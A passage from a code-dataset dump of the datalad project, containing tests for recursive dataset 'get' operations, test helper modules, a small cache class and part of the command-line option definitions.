eq_(d.repo.get_description(), 'youcouldnotmakethisup')\n\n # there are 3 files to get: test-annex.dat within each dataset:\n rel_path_sub1 = opj(basename(subds1.path), 'test-annex.dat')\n rel_path_sub2 = opj(basename(subds2.path), 'test-annex.dat')\n annexed_files = {'test-annex.dat',\n rel_path_sub1,\n rel_path_sub2}\n\n # None of them is currently present:\n ok_(ds.repo.file_has_content('test-annex.dat') is False)\n ok_(subds1.repo.file_has_content('test-annex.dat') is False)\n ok_(subds2.repo.file_has_content('test-annex.dat') is False)\n\n assert_repo_status(subds1.path)\n # explicitly given path in subdataset => implicit recursion:\n # MIH: Nope, we fulfill the dataset handle, but that doesn't\n # imply fulfilling all file handles\n result = ds.get(rel_path_sub1, recursive=True)\n # the subdataset was already present\n assert_in_results(\n result,\n type='dataset',\n path=subds1.path,\n status='notneeded')\n # we got the file\n assert_in_results(\n result,\n path=opj(ds.path, rel_path_sub1),\n status='ok')\n\n assert_in_results(result, path=opj(ds.path, rel_path_sub1), status='ok')\n ok_(subds1.repo.file_has_content('test-annex.dat') is True)\n\n # drop it:\n subds1.repo.drop('test-annex.dat')\n ok_(subds1.repo.file_has_content('test-annex.dat') is False)\n\n # now, with a path not explicitly pointing within a\n # subdataset, but recursive option:\n # get everything:\n result = ds.get(recursive=True, result_filter=lambda x: x.get('type') != 'dataset')\n assert_status('ok', result)\n\n eq_(set([item.get('path')[len(ds.path) + 1:] for item in result\n if item['type'] == 'file']),\n annexed_files)\n ok_(ds.repo.file_has_content('test-annex.dat') is True)\n ok_(subds1.repo.file_has_content('test-annex.dat') is True)\n ok_(subds2.repo.file_has_content('test-annex.dat') is True)\n\n # drop them:\n ds.repo.drop('test-annex.dat')\n subds1.repo.drop('test-annex.dat')\n subds2.repo.drop('test-annex.dat')\n ok_(ds.repo.file_has_content('test-annex.dat') is False)\n ok_(subds1.repo.file_has_content('test-annex.dat') is False)\n ok_(subds2.repo.file_has_content('test-annex.dat') is False)\n\n # now, the very same call, but without recursive:\n result = ds.get('.', recursive=False)\n assert_status('ok', result)\n # no duplicate reporting on subdataset install and annex-get of its\n # directory\n eq_(len(result), 1)\n assert_result_count(\n result, 1, path=opj(ds.path, 'test-annex.dat'), status='ok')\n ok_(ds.repo.file_has_content('test-annex.dat') is True)\n ok_(subds1.repo.file_has_content('test-annex.dat') is False)\n ok_(subds2.repo.file_has_content('test-annex.dat') is False)\n\n\n@with_tempfile(mkdir=True)\n@with_tempfile(mkdir=True)\ndef test_get_greedy_recurse_subdatasets(src=None, path=None):\n _mk_submodule_annex(src, 'test-annex.dat', 'irrelevant')\n\n ds = install(\n path, source=src,\n result_xfm='datasets', return_type='item-or-list')\n\n # GIMME EVERYTHING\n ds.get(['subm 1', '2'])\n\n # We got all content in the subdatasets\n subds1, subds2 = ds.subdatasets(result_xfm='datasets')\n ok_(ds.repo.file_has_content('test-annex.dat') is False)\n ok_(subds1.repo.file_has_content('test-annex.dat') is True)\n ok_(subds2.repo.file_has_content('test-annex.dat') is True)\n\n\n@with_tempfile(mkdir=True)\n@with_tempfile(mkdir=True)\ndef test_get_install_missing_subdataset(src=None, path=None):\n _mk_submodule_annex(src, 'test-annex.dat', 'irrelevant')\n\n ds = install(\n path=path, source=src,\n result_xfm='datasets', return_type='item-or-list')\n ds.create(force=True) # force, to cause dataset initialization\n subs = ds.subdatasets(result_xfm='datasets')\n ok_(all([not sub.is_installed() for sub in subs]))\n\n # we don't install anything, if no explicitly given path points into a\n # not yet installed subdataset:\n ds.get(curdir)\n ok_(all([not sub.is_installed() for sub in subs]))\n\n # but we do, whenever a given path is contained in such a subdataset:\n file_ = opj(subs[0].path, 'test-annex.dat')\n ds.get(file_)\n ok_(subs[0].is_installed())\n ok_(subs[0].repo.file_has_content('test-annex.dat') is True)\n\n # but we fulfill any handles, and dataset handles too\n ds.get(curdir, recursive=True)\n ok_(all([sub.is_installed() for sub in subs]))\n\n\n@slow # 13.4610s\n# @with_tree(tree={'file_in_git.txt': 'no idea',\n# 'subds': {'file_in_annex.txt': 'content'}})\n@with_tempfile(mkdir=True)\n@with_tempfile(mkdir=True)\ndef test_get_mixed_hierarchy(src=None, path=None):\n\n origin = Dataset(src).create(annex=False)\n origin_sub = origin.create('subds')\n with open(opj(origin.path, 'file_in_git.txt'), \"w\") as f:\n f.write('no idea')\n with open(opj(origin_sub.path, 'file_in_annex.txt'), \"w\") as f:\n f.write('content')\n origin.save('file_in_git.txt', to_git=True)\n origin_sub.save('file_in_annex.txt')\n origin.save()\n\n # now, install that thing:\n ds, subds = install(\n path, source=src, recursive=True,\n result_xfm='datasets', return_type='item-or-list', result_filter=None)\n ok_(subds.repo.file_has_content(\"file_in_annex.txt\") is False)\n\n # and get:\n result = ds.get(curdir, recursive=True)\n # git repo and subds\n assert_status(['ok', 'notneeded'], result)\n assert_result_count(\n result, 1, path=opj(subds.path, \"file_in_annex.txt\"), status='ok')\n ok_(subds.repo.file_has_content(\"file_in_annex.txt\") is True)\n\n\n@slow # 20 sec\n@with_tempfile(mkdir=True)\n@with_tempfile(mkdir=True)\ndef test_get_autoresolve_recurse_subdatasets(src=None, path=None):\n\n origin = Dataset(src).create()\n origin_sub = origin.create('sub')\n origin_subsub = origin_sub.create('subsub')\n with open(opj(origin_subsub.path, 'file_in_annex.txt'), \"w\") as f:\n f.write('content')\n origin.save(recursive=True)\n\n ds = install(\n path, source=src,\n result_xfm='datasets', return_type='item-or-list')\n eq_(len(ds.subdatasets(state='present')), 0)\n\n with chpwd(ds.path):\n results = get(opj(ds.path, 'sub'), recursive=True, result_xfm='datasets')\n eq_(len(ds.subdatasets(state='present', recursive=True)), 2)\n subsub = Dataset(opj(ds.path, 'sub', 'subsub'))\n ok_(subsub.is_installed())\n assert_in(subsub, results)\n # all file handles are fulfilled by default\n ok_(Dataset(opj(ds.path, 'sub', 'subsub')).repo.file_has_content(\n \"file_in_annex.txt\") is True)\n\n\n@slow # 92sec\n@with_tempfile(mkdir=True)\n@with_tempfile(mkdir=True)\ndef test_recurse_existing(src=None, path=None):\n origin_ds = _make_dataset_hierarchy(src)\n\n # make sure recursion_limit works as expected across a range of depths\n for depth in range(len(origin_ds)):\n res = install(\n path, source=src, recursive=True, recursion_limit=depth,\n result_xfm=None, return_type='list', result_filter=None)\n # we expect one dataset per level\n assert_result_count(\n res, depth + 1, type='dataset', status='ok')\n rmtree(path)\n\n # now install all but the last two levels, no data\n root, sub1, sub2 = install(\n path, source=src, recursive=True, recursion_limit=2,\n result_xfm='datasets', result_filter=None)\n ok_(sub2.repo.file_has_content('file_in_annex.txt') is False)\n sub3 = Dataset(opj(sub2.path, 'sub3'))\n ok_(not sub3.is_installed())\n # now get all content in all existing datasets, no new datasets installed\n # in the process\n files = root.get(curdir, recursive=True, recursion_limit='existing')\n assert_not_in_results(files, type='dataset', status='ok')\n assert_result_count(files, 1, type='file', status='ok')\n ok_(sub2.repo.file_has_content('file_in_annex.txt') is True)\n ok_(not sub3.is_installed())\n # now pull down all remaining datasets, no data\n sub3, sub4 = root.get(\n curdir, recursive=True, get_data=False,\n result_xfm='datasets', result_filter=lambda x: x['status'] == 'ok')\n ok_(sub4.is_installed())\n ok_(sub3.repo.file_has_content('file_in_annex.txt') is False)\n # aaannd all data\n files = root.get(curdir, recursive=True, result_filter=lambda x: x['status'] == 'ok' and x['type'] == 'file')\n eq_(len(files), 1)\n ok_(sub3.repo.file_has_content('file_in_annex.txt') is True)\n\n\n@slow # 33sec\n@with_tempfile(mkdir=True)\n@with_tempfile(mkdir=True)\ndef test_get_in_unavailable_subdataset(src=None, path=None):\n _make_dataset_hierarchy(src)\n root = install(\n path, source=src,\n result_xfm='datasets', return_type='item-or-list')\n targetpath = opj('sub1', 'sub2')\n targetabspath = opj(root.path, targetpath)\n with chpwd(path):\n res = get(targetabspath)\n assert_result_count(res, 2, status='ok', action='install', type='dataset')\n # dry-fit result filter that only returns the result that matched the requested\n # path\n filtered = [r for r in res if only_matching_paths(r, path=targetabspath)]\n assert_result_count(\n filtered, 1, status='ok', action='install', type='dataset',\n path=targetabspath)\n # we got the dataset, and its immediate content, but nothing below\n sub2 = Dataset(targetabspath)\n ok_(sub2.is_installed())\n ok_(sub2.repo.file_has_content('file_in_annex.txt') is True)\n ok_(not Dataset(opj(targetabspath, 'sub3')).is_installed())\n\n\n@with_tempfile(mkdir=True)\n@with_tempfile(mkdir=True)\ndef test_gh3356(src=None, path=None):\n # create toy version of gh-3356 scenario\n origin = Dataset(src).create()\n origin_sub = origin.create(origin.pathobj / 'subdir'/ 'subds')\n for p in (\n (origin_sub.pathobj / 'data' / 'file_in_annex.txt'),\n (origin_sub.pathobj / 'data' / 'file_in_annex2.txt')):\n p.parent.mkdir(parents=True, exist_ok=True)\n p.write_text(p.name)\n origin.save(recursive=True)\n clone = install(\n path, source=src, result_xfm='datasets', return_type='item-or-list')\n targetpaths = [\n opj('subdir', 'subds', 'data', 'file_in_annex.txt'),\n opj('subdir', 'subds', 'data', 'file_in_annex2.txt'),\n ]\n with chpwd(path):\n res = get(targetpaths)\n # get() must report success on two files\n assert_result_count(res, 2, action='get', type='file', status='ok')\n # status must report content for two files\n assert_result_count(\n clone.status(recursive=True, annex='all'), 2,\n action='status', has_content=True)\n\n\n# The setup here probably breaks down with adjusted branches.\n@skip_if_adjusted_branch\n@slow # ~12s\n@skip_if_on_windows\n@skip_ssh\n@with_tempfile(mkdir=True)\ndef test_get_subdataset_direct_fetch(path=None):\n path = Path(path)\n origin = Dataset(path / \"origin\").create()\n for sub in [\"s0\", \"s1\"]:\n sds = origin.create(origin.pathobj / sub)\n sds.repo.commit(msg=\"another commit\", options=[\"--allow-empty\"])\n origin.save()\n s0 = Dataset(origin.pathobj / \"s0\")\n s1 = Dataset(origin.pathobj / \"s1\")\n # Abandon the recorded commit so that it needs to be brought down by a\n # direct fetch.\n s0.repo.call_git([\"reset\", \"--hard\", \"HEAD~\"])\n s1.repo.call_git([\"reset\", \"--hard\", \"HEAD~\"])\n\n # Tweak the configuration of s0 to make the direct fetch fail.\n # Disallow direct oid fetch (default).\n s0.repo.config.set(\"uploadpack.allowAnySHA1InWant\", \"false\",\n scope=\"local\")\n # Configure the fetcher to avoid v2, which allows fetching unadvertised\n # objects regardless of the value of uploadpack.allowAnySHA1InWant.\n s0.repo.config.set(\"protocol.version\", \"0\", scope=\"local\")\n\n # Configure s1 to succeed with direct fetch.\n s1.repo.config.set(\"uploadpack.allowAnySHA1InWant\", \"true\",\n scope=\"local\")\n\n clone = install(\n str(path / \"clone\"),\n source=\"ssh://datalad-test:\" + origin.repo.pathobj.as_posix())\n\n res = clone.get([\"s0\", \"s1\"], on_failure=\"ignore\")\n assert_result_count(res, 1,\n action=\"install\", type=\"dataset\", status=\"error\")\n assert_result_count(res, 1,\n action=\"install\", type=\"dataset\", status=\"ok\")\n\n\n@with_tempfile()\ndef test_get_relays_command_errors(path=None):\n ds = Dataset(path).create()\n (ds.pathobj / \"foo\").write_text(\"foo\")\n ds.save()\n ds.drop(\"foo\", reckless='kill')\n assert_result_count(\n ds.get(\"foo\", on_failure=\"ignore\", result_renderer='disabled'),\n 1, action=\"get\", type=\"file\", status=\"error\")\n\n\n@with_tempfile()\ndef test_missing_path_handling(path=None):\n ds = Dataset(path).create()\n ds.save()\n\n class Struct:\n pass\n\n refds = Struct()\n refds.pathobj = Path(\"foo\")\n refds.subdatasets = []\n refds.path = \"foo\"\n\n with \\\n patch(\"datalad.distribution.get._get_targetpaths\") as get_target_path, \\\n patch(\"datalad.distribution.get.require_dataset\") as require_dataset, \\\n patch(\"datalad.distribution.get._install_targetpath\") as _install_targetpath, \\\n patch(\"datalad.distribution.get.Subdatasets\") as subdatasets:\n\n get_target_path.return_value = [{\n \"status\": \"error\"\n }]\n require_dataset.return_value = refds\n _install_targetpath.return_value = [{\n \"status\": \"notneeded\",\n \"path\": \"foo\",\n \"contains\": \"xxx\"\n }]\n subdatasets.return_value = [{\n \"type\": \"file\",\n \"status\": \"impossible\",\n \"path\": \"foo\",\n \"message\": \"path not contained in any matching subdataset\"}]\n\n # Check for guarded access in error results\n ds.get(\"foo\")\n\n\n@slow # started to >~30sec. https://github.com/datalad/datalad/issues/6412\n@known_failure_windows # create-sibling-ria + ORA not fit for windows\n@with_tempfile\n@with_tempfile\n@with_tree(tree={'sub1': {'file1.txt': 'content 1'},\n 'sub2': {'file2.txt': 'content 2'}})\n@with_tempfile\n@with_tempfile\ndef test_source_candidate_subdataset(store1=None, store2=None, intermediate=None,\n super=None, clone=None):\n\n # This tests the scenario of gh-6159.\n # However, the actual point is to test that `get` does not overwrite a\n # source candidate config in subdatasets, if they already have such a\n # config. This could come from any postclone_cfg routine, but the only one\n # actually doing this ATM is postclone_cfg_ria.\n\n ds = Dataset(intermediate).create(force=True)\n ds.create(\"sub1\", force=True)\n ds.create(\"sub2\", force=True)\n ds.save(recursive=True)\n ria_url_1 = \"ria+\" + get_local_file_url(store1, compatibility='git')\n ds.create_sibling_ria(ria_url_1, \"firststore\", recursive=True,\n new_store_ok=True)\n ds.push(\".\", to=\"firststore\", recursive=True)\n superds = Dataset(super).create()\n superds.clone(source=ria_url_1 + \"#\" + ds.id, path=\"intermediate\")\n ria_url_2 = \"ria+\" + get_local_file_url(store2, compatibility='git')\n superds.create_sibling_ria(ria_url_2, \"secondstore\", new_store_ok=True)\n superds.push(\".\", to=\"secondstore\")\n\n cloneds = install(clone, source=ria_url_2 + \"#\" + superds.id)\n\n # This would fail if source candidates weren't right, since cloneds only\n # knows the second store so far (which doesn't have the subdatasets).\n cloneds.get(\"intermediate\", recursive=True)\n\n\n@with_tempfile\n@with_tempfile\ndef test_get_non_existing(origin_path=None, clone_path=None):\n\n # test for gh-5537\n _make_dataset_hierarchy(origin_path)\n super_ds = clone(source=origin_path, path=clone_path)\n res = super_ds.get(opj(\"sub1\", \"sub2\", \"sub3\",\n \"file_in_annex.wrong.extension\"),\n result_renderer=\"disabled\", on_failure='ignore')\n # report failure only once:\n assert_result_count(res, 1, status=\"impossible\",\n message=\"path does not exist\")\n\n # same after intermediates are installed:\n res = super_ds.get(opj(\"sub1\", \"sub2\", \"sub3\",\n \"file_in_annex.wrong.extension\"),\n result_renderer=\"disabled\", on_failure='ignore')\n\n assert_result_count(res, 1, status=\"impossible\",\n message=\"path does not exist\")\n" }, { "alpha_fraction": 0.5890728235244751, "alphanum_fraction": 0.5930463671684265, "avg_line_length": 26.962963104248047, "blob_id": "859164fe4337a6122f55e5612be75535db4ff92e", "content_id": "fc5ecd526bcee5fd9f5204890845e349c25d2ef5", "detected_licenses": [ "BSD-3-Clause", "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3020, "license_type": "permissive", "max_line_length": 87, "num_lines": 108, "path": "/datalad/distributed/tests/ria_utils.py", "repo_name": "datalad/datalad", "src_encoding": "UTF-8", "text": "# emacs: -*- mode: python; py-indent-offset: 4; tab-width: 4; indent-tabs-mode: nil -*-\n# ex: set sts=4 ts=4 sw=4 et:\n# ## ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##\n#\n# See COPYING file distributed along with the datalad package for the\n# copyright and license terms.\n#\n# ## ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##\n\nimport inspect\nimport os\nfrom functools import wraps\nfrom glob import glob\n\nfrom datalad.tests.utils_pytest import (\n SkipTest,\n attr,\n create_tree,\n)\nfrom datalad.utils import Path\n\ncommon_init_opts = [\"encryption=none\", \"type=external\", \"externaltype=ora\",\n \"autoenable=true\"]\n\nexample_payload = {\n 'one.txt': 'content1',\n 'subdir': {\n 'two': 'content2',\n },\n}\n\n\nexample_payload2 = {\n 'three.txt': 'content3',\n 'subdir': {\n 'four': 'content4',\n },\n}\n\n\ndef get_all_files(path):\n return sorted([\n Path(p).relative_to(path)\n for p in glob(str(Path(path) / '**'), recursive=True)\n if not Path(p).is_dir()\n ])\n\n\ndef initremote(repo, name, encryption=None, config=None):\n cfg = dict(config) if config else {}\n cfg['encryption'] = encryption if encryption else 'none'\n args = ['{}={}'.format(k, v) for k, v in cfg.items()]\n repo.init_remote(name, args)\n\n\ndef initexternalremote(repo, name, type, encryption=None, config=None):\n config = dict(\n config if config else {},\n type='external',\n externaltype=type,\n )\n return initremote(repo, name, encryption=encryption, config=config)\n\n\ndef setup_archive_remote(repo, archive_path):\n\n # for integration in a URL, we need POSIX version of the path\n archive_path = Path(archive_path)\n\n if 'DATALAD_TESTS_SSH' in os.environ:\n cfg = {'url': 'ria+ssh://datalad-test{}'\n ''.format(archive_path.as_posix())}\n else:\n cfg = {'url': 'ria+{}'.format(archive_path.as_uri())}\n initexternalremote(repo, 'archive', 'ora', config=cfg)\n\n\ndef populate_dataset(ds):\n # create 2 commits\n for pl in [example_payload, example_payload2]:\n create_tree(ds.path, pl)\n ds.save()\n\n\ndef check_not_generatorfunction(func):\n \"\"\"Internal helper to verify that we are not decorating generator tests\"\"\"\n if inspect.isgeneratorfunction(func):\n raise RuntimeError(\"{}: must not be decorated, is a generator test\"\n .format(func.__name__))\n\n\ndef skip_non_ssh(func):\n \"\"\"Skips non-SSH-based tests if environment variable DATALAD_TESTS_SSH was\n set\n\n This is for test alternatives in order to blow runtime of SSH testing with\n tests that ran in other test builds.\n \"\"\"\n\n check_not_generatorfunction(func)\n\n @wraps(func)\n @attr('skip_ssh')\n def _wrap_skip_non_ssh(*args, **kwargs):\n if 'DATALAD_TESTS_SSH' in os.environ:\n raise SkipTest(\"Disabled, since DATALAD_TESTS_SSH is set\")\n return func(*args, **kwargs)\n return _wrap_skip_non_ssh\n" }, { "alpha_fraction": 0.608555257320404, "alphanum_fraction": 0.6125907897949219, "avg_line_length": 43.25, "blob_id": "fb2957e64bda138de93541e5dcd87a572d148f1f", "content_id": "43d4a1a057ebde1b9afa0db72c9ac29acda82228", "detected_licenses": [ "BSD-3-Clause", "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1239, "license_type": "permissive", "max_line_length": 100, "num_lines": 28, "path": "/datalad/downloaders/tests/utils.py", "repo_name": "datalad/datalad", "src_encoding": "UTF-8", "text": "# emacs: -*- mode: python; py-indent-offset: 4; tab-width: 4; indent-tabs-mode: nil -*-\n# ex: set sts=4 ts=4 sw=4 et:\n# ## ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##\n#\n# See COPYING file distributed along with the datalad package for the\n# copyright and license terms.\n#\n# ## ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##\n\"\"\"Downloader tests helper utils\"\"\"\n\nfrom unittest import SkipTest\n\nfrom datalad.downloaders.providers import Providers\n\n\ndef get_test_providers(url=None, reload=False):\n \"\"\"Return reusable instance of our global providers + verify credentials for url\"\"\"\n _test_providers = Providers.from_config_files(reload=reload)\n if url is not None:\n # check if we have credentials for the url\n provider = _test_providers.get_provider(url, only_nondefault=True)\n if provider is None or provider.credential is None:\n # no registered provider, or no credential needed,must be all kosher to access\n pass\n elif not provider.credential.is_known:\n raise SkipTest(\"This test requires known credentials for %s\" % provider.credential.name)\n return _test_providers\nget_test_providers.__test__ = False\n" }, { "alpha_fraction": 0.5367775559425354, "alphanum_fraction": 0.553415060043335, "avg_line_length": 33.60606002807617, "blob_id": "7dde2b356cac815f5737a3fe59a36f19c28ea993", "content_id": "387cc703cabcdf010a484c0ecb6c0d4c617cf26d", "detected_licenses": [ "BSD-3-Clause", "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1142, "license_type": "permissive", "max_line_length": 87, "num_lines": 33, "path": "/datalad/support/cache.py", "repo_name": "datalad/datalad", "src_encoding": "UTF-8", "text": "# emacs: -*- mode: python; py-indent-offset: 4; tab-width: 4; indent-tabs-mode: nil -*-\n# ex: set sts=4 ts=4 sw=4 et:\n# ## ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##\n#\n# See COPYING file distributed along with the datalad package for the\n# copyright and license terms.\n#\n# ## ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##\n\"\"\"Simple constructs to be used as caches\n\"\"\"\n\nfrom collections import OrderedDict\n\nfrom functools import lru_cache\n\n\n# based on http://stackoverflow.com/a/2437645/1265472\nclass DictCache(OrderedDict):\n \"\"\"A simple cache (dictionary) with limited size which expunges oldest entries\n \"\"\"\n def __init__(self, *args, **kwds):\n self.size_limit = kwds.pop(\"size_limit\", None)\n OrderedDict.__init__(self, *args, **kwds)\n self._check_size_limit()\n\n def __setitem__(self, key, value):\n OrderedDict.__setitem__(self, key, value)\n self._check_size_limit()\n\n def _check_size_limit(self):\n if self.size_limit is not None:\n while len(self) > self.size_limit:\n self.popitem(last=False)\n" }, { "alpha_fraction": 0.67726069688797, "alphanum_fraction": 0.6778282523155212, "avg_line_length": 41.175533294677734, "blob_id": "d8bb702ffcd6ef018010097b6a02f3a8ce7bb1db", "content_id": "18a81ad26bc137f5125f6d6738063c65887a0a90", "detected_licenses": [ "BSD-3-Clause", "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 15858, "license_type": "permissive", "max_line_length": 101, "num_lines": 376, "path": "/datalad/interface/common_opts.py", "repo_name": "datalad/datalad", "src_encoding": "UTF-8", "text": "# emacs: -*- mode: python; py-indent-offset: 4; tab-width: 4; indent-tabs-mode: nil -*-\n# ex: set sts=4 ts=4 sw=4 et:\n# ## ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##\n#\n# See COPYING file distributed along with the datalad package for the\n# copyright and license terms.\n#\n# ## ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##\n\"\"\"Common interface options\n\n\"\"\"\n\n__docformat__ = 'restructuredtext'\n\nfrom datalad.interface.results import known_result_xfms\nfrom datalad.support.param import Parameter\nfrom datalad.support.constraints import (\n EnsureBool,\n EnsureCallable,\n EnsureChoice,\n EnsureInt,\n EnsureNone,\n EnsureStr,\n EnsureStrPrefix,\n)\n\nlocation_description = Parameter(\n args=(\"-D\", \"--description\",),\n constraints=EnsureStr() | EnsureNone(),\n doc=\"\"\"short description to use for a dataset location. Its primary\n purpose is to help humans to identify a dataset copy (e.g., \"mike's dataset\n on lab server\"). Note that when a dataset is published, this information\n becomes available on the remote side.\"\"\")\n\nrecursion_flag = Parameter(\n args=(\"-r\", \"--recursive\",),\n action=\"store_true\",\n doc=\"\"\"if set, recurse into potential subdatasets\"\"\")\n\nrecursion_limit = Parameter(\n args=(\"-R\", \"--recursion-limit\",),\n metavar=\"LEVELS\",\n constraints=EnsureInt() | EnsureNone(),\n doc=\"\"\"limit recursion into subdatasets to the given number of levels\"\"\")\n\ncontains = Parameter(\n args=('--contains',),\n metavar='PATH',\n action='append',\n doc=\"\"\"limit to the subdatasets containing the\n given path. If a root path of a subdataset is given, the last\n considered dataset will be the subdataset itself.[CMD: This\n option can be given multiple times CMD][PY: Can be a list with\n multiple paths PY], in which case datasets that\n contain any of the given paths will be considered.\"\"\",\n constraints=EnsureStr() | EnsureNone())\n\nfulfilled = Parameter(\n args=(\"--fulfilled\",),\n doc=\"\"\"DEPRECATED: use [CMD: --state CMD][PY: `state` PY]\n instead. If given, must be a boolean flag indicating whether\n to consider either only locally present or absent datasets.\n By default all subdatasets are considered regardless of their\n status.\"\"\",\n constraints=EnsureBool() | EnsureNone())\n\ndataset_state = Parameter(\n args=(\"--state\",),\n doc=\"\"\"indicate which (sub)datasets to consider: either only locally present,\n absent, or any of those two kinds.\n \"\"\",\n # yoh: intentionally left out the description of default since might be\n # command specific\n constraints=EnsureChoice('present', 'absent', 'any'))\n\nshared_access_opt = Parameter(\n args=('--shared-access',),\n metavar='MODE',\n doc=\"\"\"configure shared access to a dataset, see `git init --shared`\n documentation for complete details on the supported scenarios. Possible\n values include: 'false', 'true', 'group', and 'all'\"\"\")\n\nsuper_datasets_flag = Parameter(\n args=(\"-S\", \"--super-datasets\",),\n action=\"store_true\",\n doc=\"\"\"if set, save a change in a dataset also in its superdataset\"\"\")\n\ngit_opts = Parameter(\n args=(\"--git-opts\",),\n metavar='STRING',\n constraints=EnsureStr() | EnsureNone(),\n doc=\"\"\"option string to be passed to :command:`git` calls\"\"\")\n\ngit_clone_opts = Parameter(\n args=(\"--git-clone-opts\",),\n metavar='STRING',\n constraints=EnsureStr() | EnsureNone(),\n doc=\"\"\"option string to be passed to :command:`git clone` calls\"\"\")\n\nannex_opts = Parameter(\n args=(\"--annex-opts\",),\n metavar='STRING',\n constraints=EnsureStr() | EnsureNone(),\n doc=\"\"\"option string to be passed to :command:`git annex` calls\"\"\")\n\nannex_init_opts = Parameter(\n args=(\"--annex-init-opts\",),\n metavar='STRING',\n constraints=EnsureStr() | EnsureNone(),\n doc=\"\"\"option string to be passed to :command:`git annex init` calls\"\"\")\n\nannex_add_opts = Parameter(\n args=(\"--annex-add-opts\",),\n metavar='STRING',\n constraints=EnsureStr() | EnsureNone(),\n doc=\"\"\"option string to be passed to :command:`git annex add` calls\"\"\")\n\nannex_get_opts = Parameter(\n args=(\"--annex-get-opts\",),\n metavar='STRING',\n constraints=EnsureStr() | EnsureNone(),\n doc=\"\"\"option string to be passed to :command:`git annex get` calls\"\"\")\n\nannex_copy_opts = Parameter(\n args=(\"--annex-copy-opts\",),\n metavar='STRING',\n constraints=EnsureStr() | EnsureNone(),\n doc=\"\"\"option string to be passed to :command:`git annex copy` calls\"\"\")\n\nallow_dirty = Parameter(\n args=(\"--allow-dirty\",),\n action=\"store_true\",\n doc=\"\"\"flag that operating on a dirty repository (uncommitted or untracked content) is ok\"\"\")\n\nif_dirty_opt = Parameter(\n args=(\"--if-dirty\",),\n choices=('fail', 'save-before', 'ignore'),\n doc=\"\"\"desired behavior if a dataset with unsaved changes is discovered:\n 'fail' will trigger an error and further processing is aborted;\n 'save-before' will save all changes prior any further action;\n 'ignore' let's datalad proceed as if the dataset would not have unsaved\n changes.\"\"\")\n\nnosave_opt = Parameter(\n args=(\"--nosave\",),\n dest='save',\n action=\"store_false\",\n doc=\"\"\"by default all modifications to a dataset are immediately saved. Giving\n this option will disable this behavior.\"\"\")\n\nsave_message_opt = Parameter(\n args=(\"-m\", \"--message\",),\n metavar='MESSAGE',\n doc=\"\"\"a description of the state or the changes made to a dataset.\"\"\",\n constraints=EnsureStr() | EnsureNone())\n\nmessage_file_opt = Parameter(\n args=(\"-F\", \"--message-file\"),\n doc=\"\"\"take the commit message from this file. This flag is\n mutually exclusive with -m.\"\"\",\n constraints=EnsureStr() | EnsureNone())\n\nreckless_opt = Parameter(\n args=(\"--reckless\",),\n # if no specific mode is given, set to auto\n const='auto',\n nargs='?',\n # boolean types only for backward compatibility\n constraints=\n EnsureChoice(None, True, False, 'auto', 'ephemeral') | \\\n EnsureStrPrefix('shared-'),\n metavar='auto|ephemeral|shared-...',\n doc=\"\"\"Obtain a dataset or subdatset and set it up in a potentially \n unsafe way for performance, or access reasons. \n Use with care, any dataset is marked as 'untrusted'.\n The reckless mode is stored in a dataset's local configuration under\n 'datalad.clone.reckless', and will be inherited to any of its subdatasets.\n Supported modes are:\n ['auto']: hard-link files between local clones. In-place\n modification in any clone will alter original annex content.\n ['ephemeral']: symlink annex to origin's annex and discard local\n availability info via git-annex-dead 'here' and declares this annex private.\n Shares an annex between origin and clone w/o git-annex being aware of it.\n In case of a change in origin you need to update the clone before you're\n able to save new content on your end.\n Alternative to 'auto' when hardlinks are not an option, or number of consumed\n inodes needs to be minimized. Note that this mode can only be used with clones from\n non-bare repositories or a RIA store! Otherwise two different annex object tree\n structures (dirhashmixed vs dirhashlower) will be used simultaneously, and annex keys\n using the respective other structure will be inaccessible.\n ['shared-<mode>']: set up repository and annex permission to enable multi-user\n access. This disables the standard write protection of annex'ed files.\n <mode> can be any value support by 'git init --shared=', such as 'group', or\n 'all'.\"\"\")\n\njobs_opt = Parameter(\n args=(\"-J\", \"--jobs\"),\n metavar=\"NJOBS\",\n default='auto',\n constraints=EnsureInt() | EnsureNone() | EnsureChoice('auto'),\n doc=\"\"\"how many parallel jobs (where possible) to use. \"auto\" corresponds\n to the number defined by 'datalad.runtime.max-annex-jobs' configuration\n item\"\"\")\n\nverbose = Parameter(\n args=(\"-v\", \"--verbose\",),\n action=\"store_true\",\n doc=\"\"\"print out more detailed information while executing a command\"\"\")\n\n\nas_common_datasrc = Parameter(\n args=(\"--as-common-datasrc\",),\n metavar='NAME',\n doc=\"\"\"configure the created sibling as a common data source of the\n dataset that can be automatically used by all consumers of the\n dataset (technical: git-annex auto-enabled special remote)\"\"\")\n\n\npublish_depends = Parameter(\n args=(\"--publish-depends\",),\n metavar='SIBLINGNAME',\n doc=\"\"\"add a dependency such that the given existing sibling is\n always published prior to the new sibling. This equals setting a\n configuration item 'remote.SIBLINGNAME.datalad-publish-depends'.\n [PY: Multiple dependencies can be given as a list of sibling names\n PY][CMD: This option can be given more than once to configure multiple\n dependencies CMD]\"\"\",\n action='append',\n constraints=EnsureStr() | EnsureNone())\n\npublish_by_default = Parameter(\n args=(\"--publish-by-default\",),\n metavar='REFSPEC',\n doc=\"\"\"add a refspec to be published to this sibling by default if nothing\n specified.\"\"\",\n constraints=EnsureStr() | EnsureNone(),\n action='append')\n\nannex_wanted_opt = Parameter(\n args=(\"--annex-wanted\",),\n metavar='EXPR',\n doc=\"\"\"expression to specify 'wanted' content for the repository/sibling.\n See https://git-annex.branchable.com/git-annex-wanted/ for more\n information\"\"\",\n constraints=EnsureStr() | EnsureNone())\n\nannex_required_opt = Parameter(\n args=(\"--annex-required\",),\n metavar='EXPR',\n doc=\"\"\"expression to specify 'required' content for the repository/sibling.\n See https://git-annex.branchable.com/git-annex-required/ for more\n information\"\"\",\n constraints=EnsureStr() | 